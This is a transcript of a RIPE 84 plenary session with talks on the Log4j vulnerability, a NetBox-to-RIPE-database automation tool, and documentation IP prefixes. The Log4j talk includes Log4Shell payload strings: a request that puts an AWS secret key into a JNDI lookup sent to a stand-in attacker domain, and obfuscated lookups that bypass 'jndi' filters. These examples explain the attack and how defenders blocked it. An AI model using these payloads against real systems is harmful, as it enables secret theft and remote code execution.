RIPE 84
Plenary session
Tuesday, 17 May 2022
At 9 a.m.:
JAN ZORZ: Hello, good morning. It's 9 a.m. and we need to start the meeting. You can continue your conversations during the coffee break, thank you very much. My name is Jan, and Dmitry Kohmanyuk and I will take care of this session.
The first presenter is virtual: Sankalp Basavaraj will talk about the Log4j debacle. I would like to ask Tom Strickx, who is also a presenter, if he is in the room. Tom, if you are in the room, please upload your slides! Otherwise you will be talking with a blank screen behind you. Thank you. Sankalp Basavaraj, the stage is yours.
SANKALP BASAVARAJ: Can you all hear me all right?
JAN ZORZ: Yes.
SANKALP BASAVARAJ: Thank you. I am joining all the way from India, so I hope you have had your morning coffee. We had some interesting discussions yesterday on Layer 3, so what we will do in this session is examine Layer 7 security. But before we do that, a little bit about me: I am based out of India, a senior architect at Akamai, and over my tenure I have worked with more than 300 companies worldwide on technologies like Internet security and web performance.
So, a brief overview of the agenda. In a nutshell, what I want to do in this session is demonstrate how Internet security is evolving and also how we must adapt to it, right? As a beautiful use case I am using Log4j as an example. You might have heard about this in the news or on Twitter; it's probably the worst vulnerability that we have seen in recent years. We will look at what exactly it is, how it worked, a few personal insights on it, and I will finish with a few recommendations of mine.
So, before I dive into the specifics, let's look at a brief timeline of the events to set up some context. What happened is, in the last week of November, a security researcher discovered a vulnerability in the Java utility and logged it; we do that, it's perfectly normal. But the storm was kick-started on 9 December, when somebody exposed this on Twitter. I think it was only there for five to ten minutes and was later deleted, but that was all that was required, and then the whole mayhem started, right? This vulnerability went haywire, attackers started exploiting it, and it was so bad that the CISA director went on record to say this is the worst that she has seen; she gave out an official statement. Of course, it was given the identifier CVE-2021-44228, and there were primarily two sides: on one side, attackers who were constantly trying to evolve, evade and exploit this to the maximum; on the other, cybersecurity companies and the affected companies who were trying to thwart it and release patches to address it. So started the cat-and-mouse game. It went on for a while and went from bad to worse, to the point where, within a few days, we at Akamai were seeing about 2 million attacks per hour. That was the intensity of this attack, and that's just one company; you can read similar reports from Google or other companies as well.
But even to this day, and this has been four, five months, I routinely see logs of attackers trying to exploit this vulnerability. To give a personal example: my sister's website, which hardly gets any visitors, probably 100 visitors per month, even she saw Log4j attacks against her website. That shows the pervasiveness of this attack.
Moving on. So, what is Log4j? Let's see what the heck Log4j is all about. Full disclaimer: I am trying to condense the technical information into layman's terms for the benefit of the larger audience; if you have any questions you can connect with me offline. Log4j is a Java-based logging utility. Whatever code we run on Java, everything has to be logged, and this is one open source utility for that which is very popular; it's also, you know, helpful for debugging, event logs and all that stuff. Since it's open source and very versatile, it's used very widely.
One of the important features of Log4j is known as lookups. What is a lookup? A lookup is nothing but an expression; I have given an example there. I had this whole interactivity built in, but I think it's not showing here. Anyway, a lookup is nothing but an expression, so when you include an expression, what Log4j will do is read it and replace it with whatever the expression evaluates to. For example, in the first line on the right side I have written a date expression followed by 'all systems good'. When Log4j reads that, it will replace the expression with the date and log the date and 'all systems good'. Very simple. One of the powerful features of Log4j is that you can nest multiple such expressions together. In the third line, which I have highlighted there, a lowercase lookup wraps a username expression, so it will take the username and make it lowercase, and Log4j will log it as the lowercase current user. All of this will go into the logs, right?
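As a rough illustration of that lookup mechanism (a toy sketch, not the real Log4j code; the supported prefixes and the date format here are simplifications, and Python is used instead of Java):

```python
# Toy model of Log4j-style lookups: scan a message for ${...} expressions
# and substitute them, innermost first. Illustrative only.
import datetime
import os
import re

def toy_lookup(expr: str) -> str:
    # Resolve a single "prefix:argument" lookup (tiny assumed subset).
    prefix, _, arg = expr.partition(":")
    if prefix == "date":
        return datetime.datetime.now().strftime(arg or "%Y-%m-%d")
    if prefix == "lower":
        return arg.lower()
    if prefix == "env":
        return os.environ.get(arg, "")
    return expr  # unknown prefix: leave as-is

def expand(message: str) -> str:
    # Repeatedly replace the innermost ${...} so nested lookups compose.
    pattern = re.compile(r"\$\{([^${}]*)\}")
    while (m := pattern.search(message)):
        message = message[:m.start()] + toy_lookup(m.group(1)) + message[m.end():]
    return message

print(expand("${date:%Y-%m-%d} all systems good"))
print(expand("current user is ${lower:${env:USER}}"))  # nesting works
```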
Now, if it were only this, we wouldn't be having this conversation; it was powerful, simple, all good. But the problem started with a thing called JNDI. JNDI is nothing but the Java Naming and Directory Interface. What it does is give this utility the capability to go out and talk to certain external directories, be it DNS, be it LDAP, so it gives it the power to go out to the external world and interact with directories, right? Let's call this a genie, and the way to summon it is using a jndi expression. I have given an example there: the current mail host is a jndi expression, so the moment the Log4j utility reads that parameter, JNDI will go out and replace it with, say, the host name from the configuration server. So that's how it works.
Now, fair enough, where is the vulnerability? Because it's clear-cut, it's powerful, everything is good, so where is the vulnerability? Let me demonstrate that with two examples of how this can be exploited, which will give you a sense of how easy it was to exploit this vulnerability.
The first is a data exfiltration vector. So assume I am a bad guy, and what I do is go and register a domain called malware.example. I write an expression like the one I have on the left side with jndi: go look up the secret key, append it to malware.example, and then, brute force, I smuggle this expression everywhere I can. And if you think that smuggling this expression into an environment is difficult, it's actually pretty easy; you can include it in a URL or in some header or something. The moment Log4j reads this, the JNDI genie gets summoned: it will take the AWS secret key and append it to malware.example. Since I own the domain, the DNS lookup actually happens against my server, so now I have the AWS secret key and I know where it came from, so I can easily, you know, compromise that data centre.
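A sketch of that exfiltration vector, for illustration only (the victim URL is hypothetical, the header is just one of many places the string could be smuggled, and you should never try this against systems you don't own):

```python
# If a vulnerable Log4j instance logs this header, the nested ${env:...}
# lookup resolves first, so the secret becomes part of the host name in
# a DNS/LDAP query towards the attacker-controlled malware.example.
import urllib.request

payload = "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.malware.example/a}"
req = urllib.request.Request("https://victim.example/",
                             headers={"User-Agent": payload})
urllib.request.urlopen(req)  # the server-side logging does the rest
```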
Example number 2: remote code execution. For this example, same thing: Sankalp is the bad guy, he owns malware.example, and the expression says do an LDAP query on this URL. I smuggle this again, so JNDI, being completely naive, will send out the LDAP query to a domain which I own, and I reply back: hey, you might want to check out this URL, there's probably something interesting for you there. And JNDI again follows that URL, downloads the virus, and the server gets compromised. It was that easy, right? These are just two examples, but you can, you know, think wildly, is what I would say.
If JNDI was the problem here, why did we not just look for the expression and block it? Wherever you see jndi, you just block it until everything is fixed. Makes sense, right? Here is where it gets really tricky, and here is where I want to share some insights from what I experienced in those days. If it were that easy, we could have easily blocked it with a rule and called it a day, but what happened was, once we did that, attackers became even smarter, and they were getting smarter by the minute. I mean, it was chaos. For something like five days, 24/7, we had architects, we had support, we had engineers all working, with someone watching Twitter and posting: here is a way to bypass the logic. So it was mayhem. Why was it mayhem? Let me share that.
If you block JNDI, that is, look for the literal expression 'jndi' and block it, that's not going to do the job, because the attackers found new ways around it. If you look at the example, I have not written 'jndi' literally in the expression; I am composing it out of nested lookups, for instance calling the lowercase lookup on individual characters, and when the Java utility actually reads it, it eventually evaluates to the same expression. It's just that I cannot find it when I am initially scrubbing for that parameter. That's where it became difficult. What was happening is, we were building rules to thwart attacks, but then new bypasses came; they were announced in real time, and we even saw in the logs bypasses that had not been announced on Twitter. There were lots of experimental minds among the attackers coming up with new ways, so that's why it became very difficult to avoid or thwart such attacks.
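For example (illustrative payloads; the domain is hypothetical):

```python
# Both strings eventually evaluate to the same jndi expression inside a
# vulnerable Log4j, but a naive filter grepping for the literal "jndi"
# only catches the first one.
plain = "${jndi:ldap://malware.example/a}"
obfuscated = "${${lower:J}${lower:N}${lower:D}${lower:I}:ldap://malware.example/a}"

assert "jndi" in plain
assert "jndi" not in obfuscated  # yet Log4j resolves it all the same
```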
Now comes the big question: how bad was this vulnerability? We come across lots of malware every day, so why am I talking about this one? I have collected a few excerpts; take a look at them and they will give you a sense of how bad it was. The Belgian defence ministry had to shut down part of its network. The Federal Trade Commission came out and warned companies that they should not be compromised; it had previously penalised a certain company 700 million dollars because they got compromised. There are strict diktats, strict rules from regulating agencies, warnings sent out to companies that you should not fall victim to this, because that would mean loss of information, and that's a bad place to be in. I mean, imagine: I was talking to a CEO the other day, and he casually mentioned that he had started his company in 2012 but somehow it didn't take off, and he is restarting it now. That's a ten-year gap, so I asked him what happened: you had the idea, why did you wait ten years? He said there was a ransomware attack on my company back in 2012 and I lost all my information, so I had to build everything from scratch. That's the impact that such attacks have. The financial impact, the beating that a brand takes: it's colossal.
Again, this must be a one-off event, right? Wrong. It's not a one-off event. What we have seen in the pandemic is that it has changed not only the way we behave in normal life but our digital life as well. I am using data from 2020, and you can see there that there was almost an 80% increase in digital usage, and we are living in 2022, so you can only extrapolate, right? So what do the stats tell us? That the points where hackers can exploit us have increased exponentially. And not only that: Log4j is a classic example of how attacks are evolving. It's no longer one attack, one virus, which you picked up using signatures; that's outdated and probably dead. Attacks are now evolving thanks to social media and digital adoption, and the penalties are massive.
What is the solution? Right. One phrase: zero trust. If you haven't heard about zero trust, it's not a new concept; it's been around for a while, probably a decade, but it hadn't picked up pace. For those of you who don't know what it is, it's certainly not what I'm showing on my slide. Zero trust means authenticate, authorise and examine everything. Don't take anything for granted. Don't trust any entity and say, you know, this is an incoming connection or this is an employee, it's okay. No. You have to have, by default, the mindset that you have been compromised, and you have to authenticate, authorise and examine everything. That's the way to approach it; that's what zero trust is.
In line with that, I have jotted down four security recommendations, but before we go on to those, I want to explain a fundamental principle when we are talking about security. The attacks are constantly evolving, just like the coronavirus: there is always a new variant, every day, all day. How do we stay ahead of the curve? That's important. Taking the same example of Covid: how did we stay ahead of the curve with Covid? We tested insanely. Why did we do that? To catch the new variant as soon as possible. The same applies to the security domain: we need to catch the attacks as early as possible. Back in the day, we had just one firewall sitting at the data centre, used to scrub all the incoming traffic and connections, but gone are those days. We cannot afford that, simply because it's way too close to the chest, and those firewalls alone are practically dead, right? So the way to approach it is to catch attacks as early as possible. If you ask me, or any IT security architect for that matter, how early are we referring to? My answer would be: catch it at the browser if possible, or at the laptop; don't even let it flow into your data centre where all your information is stored. But of course, that's not always possible, right? So we need to have check posts in place; we need some sort of cloud security which will weed out the attacks before they reach the data centres. Does that mean it's a foolproof solution? No. That's why we also need to build our security immunity at the origin, at the data centre itself, right?
So, in line with this theme, I have given four security recommendations, at a very high level. Let's discuss them.
The first one, following the same theme: catch them early. The other day I was giving a talk on zero trust, how zero trust is applicable to IT and everything, and an interesting question came up: somebody asked, don't you think we should maintain the same thing for the code as well, the code that we write on websites and all that; don't you think the zero trust policy should be applicable to that too? And I thought, yeah, that's actually true, because security starts at the machine where you are trying to access the site. A classic example: look at the snapshots that I have given. It's a popular Garmin site which I was analysing two days ago; it's an important site, and the log-in screen is sitting there like a sitting duck, you know, waiting for an attack. So I tried to simulate an attack, and I was successful. And it's an important site.
So, my firm belief is there's a lot that can be done at the machine, at the client level itself. One of the examples is DNS: maybe go for more secure DNS, the DNSSEC or DoT protocols. I am not a big fan of DoH, but do use DNSSEC, or DoT, if you are running the domain, that is.
I also see companies which are not getting SSL right, and it's hard to believe. I work with so many companies, and I see that at least 25 to 30% of them do not mandate SSL. That's a concern. It always starts with DNS and then comes SSL, so get these two things right. After that, there is one more recommendation I would like to highlight: CORS, which is a way to tell browsers how to behave. It's complicated to implement, but if you implement it properly, it's just a bunch of headers that you are setting. For example, in the snapshot I have given there, if you had just sent one such header to the browser, then this clickjacking attack would probably have been avoided. It's a little bit tricky to implement, and that's why people don't go for it, but do it: spend some time on it, spend some resources on it, and implement it, and the attack vector, or the attack surface, reduces significantly. Your page will no longer be prone to data leakage and all that stuff. Right?
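As a rough idea of the kind of headers meant here (illustrative values only; note that clickjacking specifically is usually addressed with X-Frame-Options or a CSP frame-ancestors directive alongside the CORS headers):

```python
# Example response headers a site might send; the origin is hypothetical.
SECURITY_HEADERS = {
    # CORS: restrict which origins may read cross-origin responses.
    "Access-Control-Allow-Origin": "https://app.example",
    # Anti-clickjacking: refuse to be framed by other sites.
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}
```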
The second recommendation: build a check post. That may be a proxy, it may be a CDN, a cloud security firewall, whatever; not the traditional firewall, but in the cloud. These check posts are not fully effective, but they can sit there, scrub and weed out at least some of the traffic, and they can do much deeper inspection than your firewall can. One thing I would like to highlight: it's not enough only to have a cloud firewall; it's also essential to have a sandbox or honeypot model. One of the things that I see in the field is that not a lot of companies have a honeypot implementation. What is that? It's just a replica of your site, so when an attacker tries to attack your website or API or whatever, he or she automatically gets redirected to this replica. The attacker will think he is operating on the main site, but you, on the back end, will be getting all the attack vectors, all the attack information, right?
Again, complex stuff to build, and not a lot of companies go for it. But if I am talking in terms of getting ahead of the curve, this is the best way to do it. Have something like a sandbox or honeypot so you know what happens when bots attack. When you block something, you look at the IP, you look at some vector and you block it, and they will know. They will know that this has been blocked, they will come up with another way, they will find another loophole and attack you again; this is a common pattern in the security domain. If you block one thing, they will find another way. So a honeypot is the Holy Grail for such scenarios, because the attacker will think his attack is a success, but you are getting all the information, all the traits of the attack itself, by sitting at the back end, right?
And would having a good check post, an intermediate proxy, do the whole job? No; that used to work 10, 15 years ago, but not any more. One of the important aspects that we should be mindful of is the way that attacks are evolving. Earlier, the threats came from outside, but nowadays these threats are moving inside an organisation, inside an enterprise, inside a company. A classic example: the Twitter hack, the crypto scam. Elon Musk's Twitter account got hacked, and a lot of celebrities got hacked, and the cause they found was probably an employee that got compromised. And I have added a snippet from a news item that I picked up last night: an IT admin got pissed off at the employer and wiped all the data. So the attacks are no longer only external; they are moving inside the organisation, which makes them even more difficult to weed out, right?
Suppose one of your employees is browsing some site which they are not supposed to, and it carries some sort of virus; that's enough to infiltrate your organisation. I mean, the attacker has to be right only once, but from the other side, from the defender's perspective, we have to be right always; every asset should be secured. The trend that I am seeing these days is companies going for MFA and thinking that they are secure, but that's not the case; it's not enough. MFA and regulating a bit of access in the active directories is certainly not enough; we need to take it up a notch. MFA has proven to be as easily hackable as a normal username and password, so we have to stay ahead of the curve again. Having an MFA mechanism which sends out an OTP is definitely not enough; we have to look at the algorithms, the standards or methods which are used to generate these OTPs. I think FIDO2 is one of the best standards. We have to, you know, always stay ahead of the curve.
And the last recommendation: if I follow all these tips, will I be secure? Not really. There will always be these zero-days which will impact you. The zero trust philosophy is to assume you have been attacked, so how should we build our infrastructure? That's where this micro-segmentation concept was born. It's basically nothing but a spin on the VLANs which we used to have; it's just VLANs on steroids. What we say here is: instead of the traditional one company, one data centre model, build individual units which act as separate entities and shield them, such that if one active directory gets compromised, it will not spread. It's a containment measure. Of course we have done this with VLANs, but this is VLANs on steroids: we are regulating the chatter between two VLANs or two networks, and who has access to what in the other VLAN, so we are regulating and authenticating every packet that flows.
That's it for today. It was a short presentation, but my thought process was, you know, to put in the most layman terms how the security domain is evolving. If you have any questions you can put them in the chat, I think we have some time, or you can also connect with me on LinkedIn; I have given the handle.
JAN ZORZ: Wait. Go.
JELTE JANSEN: These are all very good tips, but I want to talk about Log4j itself. Isn't the fundamental problem of the Log4j issue something we learnt 30 years ago with SQL injection: don't parse untrusted user input?
SANKALP BASAVARAJ: Right, we have all these contingencies in place, we know this stuff, but they call it a zero-day vulnerability. I think a couple of weeks ago, Chrome announced a zero-day vulnerability. It's fine while we don't know about it, but when it's announced, people are like, okay, we goofed up. So the point is that there will always be that one bug which is, you know, what do we say, unexplored, and somewhere along the line someone might catch it, so we have to be ready.
JELTE JANSEN: Okay, thank you.
DMITRY KOHMANYUK: I will read a question from the text chat. Daniel Karrenberg from the RIPE NCC: Does it mean that we'd better build all our IT back up again from scratch?
SANKALP BASAVARAJ: If we are talking in terms of micro-segmentation or even zero trust, yeah, and that's why most companies don't go for it. You know, I have seen some hesitancy to redo the entire IT, because, I mean, if I am pitching this to Amazon and saying you have to change the way you work, it will be met with backlash. But then again, the cost of, you know, being compromised is way too high, so we might as well see what we can do, right? If not everything, at least some parts we can fix.
SPEAKER: You say it's proven that multifactor authentication is as easily hackable. What do you mean by that? Because that makes no sense to me.
SANKALP BASAVARAJ: The traditional notion is that the OTPs or the push tokens are safe, that once you have that on your website it cannot be hacked, but that's not a foolproof solution.
SPEAKER: I understand it's not foolproof, but surely there is some value added?
SANKALP BASAVARAJ: Yeah, it does add value; it will probably avoid some attacks, but it's not foolproof. That's what I meant.
SPEAKER: Okay, thanks.
JAN ZORZ: Okay, thank you, Sankalp Basavaraj, for this very good presentation.
(Applause)
DMITRY KOHMANYUK: We are glad to hear our next speaker; that's Christian Harendt from Inter.link. You have a short presentation; you are welcome.
CHRISTIAN HARENDT: Thank you, and good morning. Thank you for joining my talk. I am from Inter.link and I love to automate all kinds of network-related stuff, so I am going to show you today what you can do with the RIPE database, with some automation to fill it with data from NetBox.
What is the problem? Depending on the size of your organisation, you are dealing with hundreds or even thousands of prefixes. On the other hand, you have these RIPE policies, so you have to document all these prefixes in the RIPE database according to all these policies, which we all love to do. So this is how your RIPE database entries look, right? Or is it more like that? And this is your facial expression when the next RIPE RFC comes in.
Let's face it, keeping these objects up to date isn't much fun. It's prone to errors, you can forget about something, it's manual work, it's boring. So there must be a better solution to this.
So, we have looked around at what we have. We have NetBox, which is our single source of truth, where we document all of our prefixes, and what's good about NetBox is that it supports webhooks. In case you don't know, a webhook is an HTTP request sent to a pre-defined URL whenever you create, change or delete an object. We have looked at the RIPE database, and it is offering a REST API as well. Nice: just put the URL of the RIPE database API into a NetBox webhook, problem solved.
Okay, it's not that easy. It's great to have all this data, all of your prefixes, documented in NetBox, but the RIPE database needs additional information: admin contacts, abuse contacts, maintainer objects, organisation objects, you name it.
So how do we bring these two together?
We have looked around for a cool open source tool we could use for this, but we couldn't find any, so we have developed our own solution, and we call it the RIPE-Updater. What do we want to achieve with the RIPE-Updater?
The most important part is to automate the INET(6)NUM objects, which are the most frequently updated objects in the RIPE database. It would also be nice to add some validation to it: we do not want to document RFC 1918 addresses, as this is our private stuff and we will not put it in the public RIPE database on the Internet. We also want to check for overlapping prefixes, which can happen when you resize or split a prefix, so we want to take care of this. The next point is very important for us: it must be very easy for the administrator to document these prefixes, so all the additional data should be based on templates which you can select with a drop-down list in NetBox. It would also be nice to get some backups before you delete or overwrite an object in the RIPE database, and lastly, to get some e-mail reporting so you can keep track of what's going on.
So what do we need to run the RIPE-Updater? Of course you need NetBox, at least version 2.4 or later, a webhook and some custom fields. Two of the custom fields I want to highlight here: the first one is stored on the prefix and called 'RIPE report'; it's a boolean, basically just determining whether you want this prefix documented in the RIPE database or not. The second one is the previously mentioned drop-down list of all your templates.
What else do you need to run it? Of course you need RIPE database access with a maintainer password, and you need a platform to run this on. We have chosen Docker for that, and I think it's the easiest solution, but you can use whatever you like; it must be able to run Python code. Put a reverse proxy in front of it and you are good to go.
Let me give you an example. Here I'm creating a new prefix, and I have set 'RIPE report' to true because I want this prefix to be documented in the RIPE database. The next step is to select an appropriate template from the drop-down list, and when I create this prefix, the following things will happen:
NetBox will send a webhook to the RIPE-Updater containing all the data you have just put into the prefix. The RIPE-Updater will see the template, read it from the file system, and find there all the additional information we need. In parallel, we do the overlap check, which basically means going into the RIPE database and checking whether there is an overlapping prefix. If we find an overlapping prefix, we then check back with NetBox, which is our single source of truth, to see if this prefix is also present in NetBox. If it's not, it is considered to be deleted, but not before creating a backup of it.
Now we jump back to our main part, which is to document this newly created prefix in the RIPE database. The RIPE-Updater will merge the information from the prefix in NetBox and the selected template together and put it into an API call to the RIPE database, which you can see in the bottom right. Finally, you will receive an e-mail so you can keep track of what's going on.
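Roughly, the webhook body for a created prefix looks like this (abridged; exact fields vary by NetBox version, and the custom field names here are illustrative):

```python
webhook_body = {
    "event": "created",
    "model": "prefix",
    "data": {
        "prefix": "192.0.2.0/24",            # documentation prefix as example
        "custom_fields": {
            "ripe_report": True,             # document this one in the RIPE DB?
            "ripe_template": "customer-v4",  # hypothetical template name
        },
    },
}
```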
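A minimal sketch of that update step (the endpoint shape follows the public RIPE database REST API; the function name, template format and attribute set are hypothetical, not the actual RIPE-Updater code):

```python
import requests  # third-party: pip install requests

def update_inetnum(key: str, template: dict, password: str) -> None:
    """PUT a merged inetnum object to the RIPE database REST API."""
    attributes = [{"name": "inetnum", "value": key}] + [
        {"name": name, "value": value} for name, value in template.items()
    ]
    body = {"objects": {"object": [{
        "source": {"id": "ripe"},
        "attributes": {"attribute": attributes},
    }]}}
    resp = requests.put(f"https://rest.db.ripe.net/ripe/inetnum/{key}",
                        json=body, params={"password": password})
    resp.raise_for_status()
```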
So, let's recap:
With the RIPE-Updater, your database is always up to date and consistent, and you can be as relaxed as this guy when the next RFC is coming in. One more thing I want to mention: you can batch-process all of your inetnum objects. Say you want to add a new contact: you put the contact into the template, then just select all prefixes in NetBox, click on mass edit and click save directly, without any change. This will trigger a webhook for every prefix and make sure every prefix is up to date in the RIPE database for you.
One question remains: this is great, but why am I telling you all about this? It's because I am very proud to announce that we have released the RIPE-Updater on GitHub. You can check it out at the URL at the bottom and automate your database entries. I want to thank you for your attention. Do you have any questions?
(Applause)
JAN ZORZ: Thank you very much. That's cool. I am using NetBox, excellent stuff!
SPEAKER: Andrei, RIPE NCC. I wonder, when you do this update, does it actually update objects in the RIPE database, or delete and recreate them?
CHRISTIAN HARENDT: It will check if there's already an object present, and it will only update if there is any change to the object.
SPEAKER: It will do an update, not delete and recreate?
CHRISTIAN HARENDT: It will only delete and recreate in case you have resized the prefix.
SPEAKER: Thank you.
SPEAKER: Rinse Kloek, speaking as a private person. One question: does this also work for Nautobot?
CHRISTIAN HARENDT: Maybe; I have not tested it yet, but the data model should be very similar. You could try it out; it might just work.
SPEAKER: Okay, thank you.
JAN ZORZ: Thank you. Anyone else have a question?
DMITRY KOHMANYUK: A text one; actually two now. The first one: does it potentially support other products that support webhooks?
CHRISTIAN HARENDT: Other what?
DMITRY KOHMANYUK: Does your tool potentially support other products that also support webhooks?
CHRISTIAN HARENDT: Other products than NetBox? Maybe Nautobot is supported; basically, it will support everything which has the same data structure model as NetBox, which Nautobot may have, but other than that, I don't know.
DMITRY KOHMANYUK: Thanks. It's a good question whether you want to replace NetBox, or replace the RIPE database with another registry database. Thank you. The other one is: does the tool respect the RIPE database API rate limit, and is anything specific necessary?
CHRISTIAN HARENDT: The rate limit?
DMITRY KOHMANYUK: The API has a rate limit; maybe somebody is creating hundreds of new networks at the same time.
CHRISTIAN HARENDT: We have not taken care of that yet, but it might be a nice addition in the future, yes.
DMITRY KOHMANYUK: Yes. I guess I am going to use the product as well; I like NetBox. It's a good step in the right direction.
CHRISTIAN HARENDT: Thank you, that's great to hear.
JAN ZORZ: Thank you very much.
(Applause)
DMITRY KOHMANYUK: Okay everybody, our next speaker is Tom Strickx; I am not sure if I pronounced the last name properly. It's about RFC 3849 and RFC 5737. Tell us more, please.
TOM STRICKX: Good morning, everyone. It's amazing to be back here; it's been too long, although I guess it's still March 2020 for some of us, at least. I am going to talk about two specific RFCs. Normally that's not the most exciting or interesting conversation to have, I am sure, but I will try to make it interesting.
The reason why I want to talk about the documentation RFCs is because documentation matters, and it's one of those annoying things that we as engineers can easily forget: coding is the fun bit, configuring the network is the fun bit, but documenting the network is not the fun bit, and that's why we have solutions like NetBox, because they do it for us. It means I don't have to write the documentation myself.
But in this case, it's even worse. Let me take you back; this is now easily two or three years ago. We got a ticket where we were seeing consistent CRC errors on the egress ports of a top-of-rack switch in EWR03; that's how Cloudflare references its data centres, so if you see that in an e-mail from us, now you know.
So we have these errors, and it looks like this, which is really interesting. Each individual colour is an egress interface for a compute node that we have. Normally, the procedure we take whenever we are seeing egress or ingress errors is to just take that compute node out of production, because that's the easiest way of doing things. So we removed the node from production with the expectation that it was a faulty NIC or a bad patch cable, but instead of the errors going away, they stayed, just on a different compute node. Which is weird, because that usually indicates that something else is broken. So I saw this happening again, removed that node from production, and the errors came back, again on a different node. Clearly something was happening here that was not within the expected behaviour, where any of our operators would kind of know what's happening. So eventually we asked our SRE team, the people responsible for managing the compute side of things, to enable a specific option on the NIC that allowed us to packet-capture broken frames, because otherwise the kernel gets to them too early and they get dropped before we can tcpdump them. So we started looking at this, and what we were seeing was that the Nexus switch (these are Nexus switches, an example of a cut-through forwarding system, so it's not doing store-and-forward, just cut-through) was detecting a bad CRC coming in and propagating it, sending it forward. That usually indicates the Nexus switch was in one way or another receiving an already broken frame, but instead of counting it on ingress, it was counting it on egress. But in the way our architecture is laid out, the TORs are the last node in the network; there is a bunch of different network kit in front of those racks that, if there was a broken frame in there, should have seen that broken frame.
So, this kind of explains what's going on: we are doing some fancy things within the switch, so it makes sense why we are seeing it on egress and not on ingress, but we should have seen that on our core switch, we should have seen that on our edge router where the traffic was coming in. So something was weird. Like I said, we enabled RX-FCS, which enables us to do the packet captures, and this is the packet capture we saw: you see just a bunch of ACKs. The weird thing you might start paying attention to is this thing. The annoying part is, if you look at the packet capture, you might be able to see that there's actually some encapsulation going on here: it's ERSPAN traffic that we are seeing. For those not in the know, that is a Cisco protocol that allows you to GRE-encapsulate packet captures and forward them to an arbitrary location, allowing you to do port mirroring without needing to have a machine physically hooked up to the switch itself. So the thing is, we were still wondering: the frames themselves, the GRE packets themselves, were perfectly fine. Normally, if things are broken in Wireshark, you will see they are red; they get nice colour coding, very indicative that something is broken, fix it. That's not the case here; it's the nice yellowish green. Don't take my word for it, I'm colourblind. But apparently what was happening is that the Nexus switches have a pretty damn notorious system where they look deeper into packets than they should. The Nexus system was not erroring on the ERSPAN packet, but on the packet within the ERSPAN packet itself. The packet within the ERSPAN packet was a broken packet, and that's what the switch was complaining about. That's not helpful for anyone, especially because it's not documented; we couldn't find any documentation anywhere on the Cisco website telling us this is a thing it does. We just kind of had to go with, as I think all of us do a lot of the time, unfortunately, relying on our connections, relying on the people that we know.
But again, what does that have to do with documentation, besides the fact that, if there is anybody here from Cisco, documenting that behaviour would be of help? If you recall that packet capture, there was something in there that probably shouldn't have been, and it's this. Some of you might recognise that IP address as running a specific service that doesn't have anything to do with ERSPAN; I think it's something to do with DNS. So what was happening is, an operator in a network that won't be named was also, I think, running Nexus switches, because I found some documentation on their website, which as far as I know is still online, telling you: this is how you configure ERSPAN. That's cool, right? It would be nice if they didn't, maybe.
It gets even worse: it also sets the source IP to 1.1.1.1, which is in and of itself a pretty interesting thing. If you look at the packet capture (let's go back a bit), I blurred it out, but the source is also 1.1.1.1, so we are getting some weird traffic, unfortunately. And yeah, that kind of needs to stop, because it's no longer 2020. I want it to still be 2020, but this documentation is now more than four years old; it's about time you start updating your documentation. And obviously it's not just Cisco doing this; unfortunately it's even Cloudflare doing this, and we are the ones operating the damn thing. As you might see, that's not the documentation prefix; we don't even own that prefix. I don't know who owns that prefix; sorry if you do.
There are other things: sometimes we make labs, and 1.1.1.1 is an easy IP address to use in a lab because it's short. I now remember the documentation prefixes because I have been giving this talk a couple of times and they stick, but it's understandable for people to use those easy IP addresses; that's fine. When you get called on it, say: the fact is I messed up, it's not going to happen again. Not 'you are blocked'; that's just a bit awkward for everyone involved, really. So the easiest way to fix this is with two specific RFCs, RFCs that have been around for a long time; they are probably older than some of the newer RIPE attendees, which is amazing. RFC 3849 has been around since July 2004 and RFC 5737 since January 2010, so you can't blame ignorance, especially since you have seen this talk. I will find you. As a reminder for those in the back: write them down, remember them, it's not hard. For IPv6 it's 2001:db8::/32. Use it. And for IPv4 we even have three of them, so you can vary; variation is the spice of life. Use them. Of the three, 192.0.2.0/24 is probably the easiest one, and I think I included the test-net names; for all intents and purposes they are good enough. Please use one of these instead of 1.1.1.0/24. It makes my life easier, because I don't have to run through a bunch of weird documentation traffic that hit my network and shouldn't have. As a closing statement: it shouldn't be that difficult, really. I know it's easy to slip and we all make mistakes, but if you make that mistake, make it once, then watch my talk again and don't make it again. And that was it for me. I want to thank all of you for your attention, and for definitely using those RFCs, because you all will now, I hope. And yeah, that's it.
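For reference, the reserved documentation prefixes from those two RFCs:

```python
DOCUMENTATION_PREFIXES = [
    "192.0.2.0/24",     # TEST-NET-1, RFC 5737
    "198.51.100.0/24",  # TEST-NET-2, RFC 5737
    "203.0.113.0/24",   # TEST-NET-3, RFC 5737
    "2001:db8::/32",    # IPv6 documentation prefix, RFC 3849
]
```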
(Applause)
JAN ZORZ: Thank you very much. Now I know who is first. Oh boy.
JEN LINKOVA: Thank you for reminding everyone about those RFCs. I have one comment or, I don't know, question: using those RFCs only solves half of the problem, because twice I have looked at a number of packets with source addresses from 2001:db8::/32. People do actually read the documentation and use those addresses as source addresses for their packets, right? And, yeah, I don't know what you can do about this, but at least we can filter them.
TOM STRICKX: Exactly. That's the thing: unlike with 1.1.1.1, where we allow pretty much all traffic because it's interesting, and job security, because I can make talks like this, with the documentation prefixes, if you follow MANRS, you drop them at your firewall ‑‑
JEN LINKOVA: I am surprised how many people might start announcing ‑‑
TOM STRICKX: I have seen it all the time. At that point it's also part of the community's responsibility to drop these at the BGP border, or the firewall border. But that's workable, because they shouldn't be routed or have traffic on them, so ‑‑
JEN LINKOVA: So I guess it would be too late to ask you guys to sacrifice 1.1.1.1 as a documentation prefix. I don't know who owns 1.2.3; maybe those people can make that prefix a documentation one.
TOM STRICKX: That probably would have been a better idea.
WOLFGANG TREMMEL: DE-CIX Academy. Can you add one slide to your presentation, because there are also AS numbers reserved for documentation.
TOM STRICKX: Indeed, there are. I will.
(Applause)
PETER HESSLER: OpenBSD. Do you have any comments about people using IP addresses that will never be seen on the Internet, for example the US Department of Defence address ranges?
TOM STRICKX: I mean, it's the same thing as using the documentation prefixes in your own network for routing: it sucks to be you, I guess. We are going to drop them at our firewall, so if your stuff doesn't work, it's the same thing as with RPKI: if you are going to announce invalids and run traffic on those invalids, then ‑‑
PETER HESSLER: As we have seen with, for example, the UK Department for Work and Pensions, I believe: that space was all unannounced, then they sold it to the public, and now it's being announced and having interesting conflicts in the wild.
JAN ZORZ: You can't press the button.
SPEAKER: I am Will. I was wondering, maybe we should do something with AS112 and start announcing those prefixes at IXPs? I am wondering because some people will not filter those, and, yeah, I'm not filtering those accurately right now.
